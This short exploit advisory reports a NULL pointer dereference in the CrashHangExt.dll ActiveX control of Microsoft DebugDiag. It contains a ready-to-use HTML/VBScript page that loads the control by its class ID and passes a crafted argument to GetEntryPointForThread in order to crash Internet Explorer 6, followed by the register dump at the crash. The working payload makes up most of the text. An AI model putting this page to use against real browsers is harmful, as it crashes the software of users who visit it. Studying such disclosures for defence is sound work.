Name : DebugDiag (CrashHangExt.dll 1.0) NULL Pointer Dereference Credit : suN8Hclf (DaRk-CodeRs Group), crimson.loyd_at_gmail&#46;com Download : http://www.microsoft.com/downloads/details.aspx?FamilyID=28bd5941-c458-46f1-b24d-f60151d875a3&displaylang=en#Overview Greetz : Luigi Auriemma, Louis Carriere, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, Myo Katharsis, all fron #dark-coders =+ Product of Fuzzing += This code should crash down Internet Explorer Tested on: + Windows XP SP2 (full patched) & IE 6.0 (full patched) + Windows 2000 SP 4 (full patched) & IE 6.0 (full patched) Marked as: ================================================ Class Utils GUID: {7233D6F8-AD31-440F-BAF0-9E7A292A53DA} Number of Interfaces: 1 Default Interface: IUtils RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False ================================================ Exploit: ~~~~~~~~~~~~~~~~~~~~~~ -----------------------code.htm-------------------------- <body> <object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' /> </object> <script language='vbscript'> arg1=-2147483647 target.GetEntryPointForThread arg1 </script> </body> -----------------------code.htm-------------------------- Info ~~~~~~~~~~~~~~~~~~~~~~ EAX 00000000 ECX 0012DDDC EDX 001E98EA EBX 02C318E8 CrashHan.02C318E8 ESP 0012DD88 EBP 0012DE04 ESI 023F1FE0 EDI 00000000 EIP 02C38290 CrashHan.02C38290 IE crashes while trying to execute this line (Null pointer dereference): 02C38290 8B08 MOV ECX,DWORD PTR DS:[EAX] //www.dark-coders.pl